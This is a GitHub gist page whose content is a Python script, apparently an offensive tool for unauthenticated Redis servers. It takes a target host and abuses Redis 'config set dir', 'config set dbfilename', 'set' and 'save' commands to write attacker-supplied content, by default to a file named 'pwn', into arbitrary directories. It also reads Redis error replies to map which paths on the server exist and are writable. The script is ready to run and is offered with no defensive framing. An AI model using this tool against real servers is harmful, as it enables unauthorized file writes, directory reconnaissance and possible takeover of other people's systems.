Last active
November 25, 2019 13:50
-
-
Save sudoaza/e44df9a6899f7b51b6823a6458a75b47 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import socket | |
| import sys | |
| sock = None | |
| def connect(host, port=6379, timeout=3.0): | |
| # Create a TCP/IP socket | |
| sock = socket.socket(socket.AF_INET) | |
| # Connect the socket to the port where the server is listening | |
| server_address = (host, port) | |
| sock.connect(server_address) | |
| sock.settimeout(timeout) | |
| return sock | |
| IN_ARROW = "\033[1;34;40m[<-]\033[0m" | |
| OUT_ARROW = "\033[1;32;40m[->]\033[0m" | |
| RED_DOT = "\033[1;31;40m*\033[0m" | |
| GREEN_DOT = "\033[1;32;40m*\033[0m" | |
| E_DIR_NOT_EXIST = "-ERR Changing directory: No such file or directory" | |
| E_IS_FILE = "-ERR Changing directory: Not a directory" | |
| E_NO_READ_PERM = "-ERR Changing directory: Permission denied" | |
| E_ERR = "-ERR" | |
| OK = "+OK" | |
| def abbr(data): | |
| data = data.strip() | |
| if len(data) < 300: | |
| return data | |
| else: | |
| return f"{data[:120]}...{data[-80:]}" | |
| def send(msg): | |
| print(f"{OUT_ARROW} {abbr(msg)}") | |
| sock.sendall(str.encode(msg+"\r\n")) | |
| def recvln(): | |
| response = b"" | |
| try: | |
| while True: | |
| data = sock.recv(1024) | |
| response += data | |
| if len(data) == 0: | |
| break | |
| print(f"{IN_ARROW} {abbr(data.decode())}") | |
| if b"\r\n" in response: | |
| break | |
| return response.decode() | |
| except Exception as e: | |
| print(response, "\r\n", "ERROR: ", e) | |
| raise e | |
| def chdir(dir="/tmp"): | |
| send(f"config set dir {dir}") | |
| def store(value, key="some"): | |
| send(f"set {key} \"{value}\"") | |
| def setfile(name): | |
| send(f"config set dbfilename {name}") | |
| def save(): | |
| send("save") | |
| if __name__ == '__main__': | |
| import argparse | |
| parser = argparse.ArgumentParser() | |
| parser.add_argument("--host",'-H', required=True, help="Target host") | |
| parser.add_argument("--port",'-p', help="Target redis port, default 6379", default=6379) | |
| parser.add_argument("--dir",'-d', help="Dir for redis db", default="/tmp") | |
| parser.add_argument("--file",'-f', help="File for redis db", default="pwn") | |
| parser.add_argument("--timeout",'-t', help="Timeout", default=3.0, type=int) | |
| parser.add_argument("--content",'-c', help="Content to store", default="\\n\\nPWN\\n\\n") | |
| args = parser.parse_args() | |
| sock = connect(args.host, args.port, args.timeout) | |
| if sys.stdin.isatty(): | |
| dirs = [args.dir] | |
| else: | |
| dirs = sys.stdin.read().split("\n") | |
| setfile(args.file) | |
| recvln() | |
| store(args.content) | |
| recvln() | |
| for d in dirs: | |
| chdir(d) | |
| ans = recvln() | |
| if E_DIR_NOT_EXIST in ans: | |
| print(f"{RED_DOT} dir not found - {d}") | |
| elif E_IS_FILE in ans: | |
| print(f"{GREEN_DOT} file found - {d}") | |
| elif E_NO_READ_PERM in ans: | |
| print(f"{RED_DOT} no read permission - {d}") | |
| elif E_ERR in ans: | |
| print(f"{RED_DOT} {ans} - {d}") | |
| elif OK in ans: | |
| print(f"{GREEN_DOT} dir found - {d}") | |
| save() | |
| ans = recvln() | |
| if E_ERR in ans: | |
| print(f"{RED_DOT} no write permission - {d}{args.file}") | |
| elif OK in ans: | |
| print(f"{GREEN_DOT} saved to - {d}{args.file}") | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment